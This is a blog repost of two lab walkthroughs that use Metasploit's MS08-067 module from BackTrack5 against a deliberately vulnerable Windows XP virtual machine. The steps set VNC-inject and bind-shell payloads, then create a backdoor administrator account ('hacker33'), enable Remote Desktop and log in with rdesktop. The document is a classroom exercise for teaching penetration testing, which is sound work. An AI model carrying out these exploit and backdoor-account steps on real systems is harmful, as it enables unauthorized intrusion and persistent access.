CAO HỌC PTIT

Thứ Sáu, 29 tháng 11, 2013

Metasploit: MS08-067 - Establishing A VNCShell & rdesktop to Victim Machine

08:36:00 Unknown Chưa có nhận xét nào

Section 1. Log into Damn Vulnerable WXP-SP2

Start Up Damn Vulnerable WXP-SP2.
- Instructions:
  1. Click on Damn Vulnerable WXP-SP2
  2. Click on Edit virtual machine Settings
- Note(FYI):
  - For those of you not part of my class, this is a Windows XP machine running SP2.
Edit Virtual Machine Settings
- Instructions:
  1. Click on Network Adapter
  2. Click on the Bridged Radio button
  3. Click on the OK Button
Play Virtual Machine
- Instructions:
  1. Click on Damn Vulnerable WXP-SP2
  2. Click on Play virtual machine
Logging into Damn Vulnerable WXP-SP2.
- Instructions:
  1. Username: administrator
  2. Password: Use the Class Password or whatever you set it.
Open a Command Prompt
- Instructions:
  1. Start --> All Programs --> Accessories --> Command Prompt
Obtain Damn Vulnerable WXP-SP2's IP Address
- Instructions:
  1. ipconfig
- Note(FYI):
  - In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
  - This is the IP Address of the Victim Machine that will be attacked by Metasploit.
  - Record your Damn Vulnerable WXP-SP2's IP Address.

Section 2. Log into BackTrack5

Start Up BackTrack5R1.
- Instructions:
  1. Start Up your VMware Player
  2. Play virtual machine
Login to BackTrack
- Instructions:
  1. Login: root
  2. Password: toor or <whatever you changed it to>.
Bring up the GNOME
- Instructions:
  1. Type startx
Start up a terminal window
- Instructions:
  1. Click on the Terminal Window
Obtain the IP Address
- Instructions:
  1. ifconfig -a
- Note(FYI):
  - My IP address 192.168.1.107. In your case, it will probably be different.
  - This is the machine that will be use to attack the victim machine (Damn Vulnerable WXP-SP2).

Section 3. Starting up the Metasploit MSF Console

Start Up Metasploit msfconsole
- Instructions:
  1. Applications --> Exploitation Tools --> Network Exploitation Tools --> Metasploit Framework --> msfconsole.
- Note(FYI):
  - Metasploit takes about 5 to 20 seconds to start up.
msfconsole screen
- Note(FYI):
  - This is the msfconsole
Search for the MS08-067 Exploit
- Instructions:
  1. search ms08_067
Use exploit MS08-067 Exploit
- Instructions:
  1. use exploit/windows/smb/ms08_067_netapi
Show Payloads
- Instructions:
  1. show payloads
Set Payloads
- Instructions:
  1. set PAYLOAD windows/vncinject/bind_tcp
  2. Press <Enter>
- Note:
  - This Payload will create a VNC Server/Shell Using TCP.
Show Options
- Instructions:
  1. show options
- Note(FYI):
  - Notice the Required Column. RPORT and SMBPIPE are already populated, but RHOST is not.
  - In the next step, you will populate RHOST with the IP Address of the victim machine (Damn Vulnerable WXP-SP2).
Set RHOST and Verify
- Note(FYI):
  - Replace 192.168.1.116 with the IP Address of Damn Vulnerable WXP-SP2 obtained from (Section 1, Step 6).
- Instructions:
  1. set RHOST 192.168.1.116
  2. show options
    - The Victim's IP Address is now set.
Exploit the Victim Machine
- Instructions:
  1. exploit
- Note(FYI):
  - Notice that the vncinject stage was sent to the victim's IP Address. (See Below).
Verify VNC TCP Connection
- Instructions:
  1. netstat -nao | findstr :4444
    - In my case, 1052 is the process ID for the VNC Metasploit session.
    - In your case it will be different.
    - Use your PID with the following command.
  2. tasklist | findstr 1052
Create New Attacker Account
- Instructions:
  1. net user hacker33 abc123 /add
  2. net localgroup administrators hacker33 /add
Open Control Panel
- Instructions:
  1. Start --> Control Panel
Open System
- Instructions:
  1. Double Click on System
Allow Remote Desktop
- Instructions:
  1. Click on the Remote Tab
  2. Check Allow Remote Assistance invitations to be sent from the computer.
  3. Check Allow users to connect remotely to this computer
  4. Click OK
Reboot Damn Vulnerable WXP-SP2
- Instructions:
  1. shutdown /r
- Note(FYI):
  - We are going to test the hacker33 account that we just created on Damn Vulnerable WXP-SP2.
Start up a terminal window
- Instructions:
  1. Click on the Terminal Window
rdesktop to Damn Vulnerable WXP-SP2
- Note(FYI):
  - Replace 192.168.1.116 with the IP Address of Damn Vulnerable WXP-SP2 obtained from (Section 1, Step 6).
- Instructions:
  1. Wait until Damn Vulnerable WXP-SP2 has rebooted and is at the login screen
  2. rdesktop -u hacker33 -p abc123 192.168.1.116
Open a Command Prompt
- Instructions:
  1. Start --> All Programs --> Accessories --> Command Prompt
Set Stronger Password
- Instructions:
  1. net user hacker33 s0m3t41ng!

Xem thêm...

Metasploit: MS08-067 - Establishing A Shell To The Vulnerable Machine

08:29:00 Unknown Chưa có nhận xét nào

0. Background Information

http://www.microsoft.com/technet/security/bulletin/ms08-067.mspx
- The vulnerability could allow remote code execution if an affected system received a specially crafted RPC request. On Microsoft Windows 2000, Windows XP, and Windows Server 2003 systems, an attacker could exploit this vulnerability without authentication to run arbitrary code. It is possible that this vulnerability could be used in the crafting of a wormable exploit.
- Firewall best practices and standard default firewall configurations can help protect network resources from attacks that originate outside the enterprise perimeter.
Pre-Requisite
- BackTrack: Lesson 1: Installing BackTrack 5
Lab Notes
- In this lab we will do the following:
  1. Start up the Metasploit Framework msfconsole
  2. We will use the msfconsole to obtain a shell as the admin user on the Damn Vulnerable WXP-SP2 machine.
Legal Disclaimer - thử nghiệm trong môi trường lab

1. Log into Damn Vulnerable WXP-SP2

Edit Virtual Machine Settings
- Instructions:
  1. Click on Damn Vulnerable WXP-SP2
  2. Edit Virtual Machine Settings
- Note:
  - This VM is running Windows XP.
  - This is the Victim Machine that we will be scanning with PENTEST-WXP.
Set Network Adapter
- Instructions:
  1. Click on Network Adapter
  2. Click on the radio button "Bridged: Connected directly to the physical network".
Start Up Damn Vulnerable WXP-SP2.
- Instructions:
  1. Start Up your VMware Player
  2. Play virtual machine
Logging into Damn Vulnerable WXP-SP2.
- Instructions:
  1. Username: administrator
  2. Password: Use the Class Password or whatever you set it.
Open a Command Prompt
- Instructions:
  1. Start --> All Programs --> Accessories --> Command Prompt
Obtain the IP Address
- Instructions:
  1. ipconfig
- Note(FYI):
  - In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
  - This is the IP Address of the Victim Machine.
  - Record your IP Address.

2. Log into BackTrack5

Start Up VMWare Player
- Instructions:
  1. Click the Start Button
  2. Type Vmplayer in the search box
  3. Click on Vmplayer
Open a Virtual Machine
- Instructions:
  1. Click on Open a Virtual Machine
Open the BackTrack5R1 VM
- Instructions:
  1. Navigate to where the BackTrack5R1 VM is located
  2. Click on on the BackTrack5R1 VM
  3. Click on the Open Button
Edit the BackTrack5R1 VM
- Instructions:
  1. Select BackTrack5R1 VM
  2. Click Edit virtual machine settings
Edit Virtual Machine Settings
- Instructions:
  1. Click on Network Adapter
  2. Click on the Bridged Radio button
  3. Click on the OK Button
Play the BackTrack5R1 VM
- Instructions:
  1. Click on the BackTrack5R1 VM
  2. Click on Play virtual machine
Login to BackTrack
- Instructions:
  1. Login: root
  2. Password: toor or <whatever you changed it to>.
Bring up the GNOME
- Instructions:
  1. Type startx
Start up a terminal window
- Instructions:
  1. Click on the Terminal Window
Obtain the IP Address
- Instructions:
  1. ifconfig -a
- Note(FYI):
  - My IP address 192.168.1.111.
  - In your case, it will probably be different.

3. Starting up the Metasploit MSF Console

Start Up Metasploit msfconsole
- Instructions:
  1. msfconsole
- Note(FYI):
  - Metasploit takes about 5 to 20 seconds to start up.
msfconsole screen
- Note(FYI):
  - Your msfconsole will probably have a different picture than mine.
Search for the MS08-067 Exploit
- Instructions:
  1. search ms08_067
Use exploit MS08-067 Exploit
- Instructions:
  1. use exploit/windows/smb/ms08_067_netapi
Show Payloads
- Instructions:
  1. show payloads
Set Payloads
- Instructions:
  1. set PAYLOAD windows/shell_bind_tcp
- Note(FYI):
  - This Payload creates Windows Command Shell and Bind TCP Inline
Show Options
- Instructions:
  1. show options
- Note(FYI):
  - Notice the Required Column. RPORT and SMBPIPE are already populated, but RHOST is not.
  - In the next step, you will populate RHOST with the IP Address of WindowsVulnerable01.
Set RHOST and Verify Show Options
- Note:
  - Replace 192.168.1.116 with your WindowsVulnerable01's IP Address obtained in (Section 1, Step 4).
- Instructions:
  1. set RHOST 192.168.1.116
  2. show options
Exploit the Victim Machine
- Instructions:
  1. exploit
- Note(FYI):
  - If the exploit worked you should see a command prompt into the victim machine. (See Below).
Issue the systeminfo command
- Instructions:
  1. systeminfo
- Note:
  - This is the system information report for Windows.
Issue the tasklist command
- Instructions:
  1. tasklist
- Note:
  - This is the command line version of Task Manager in Windows.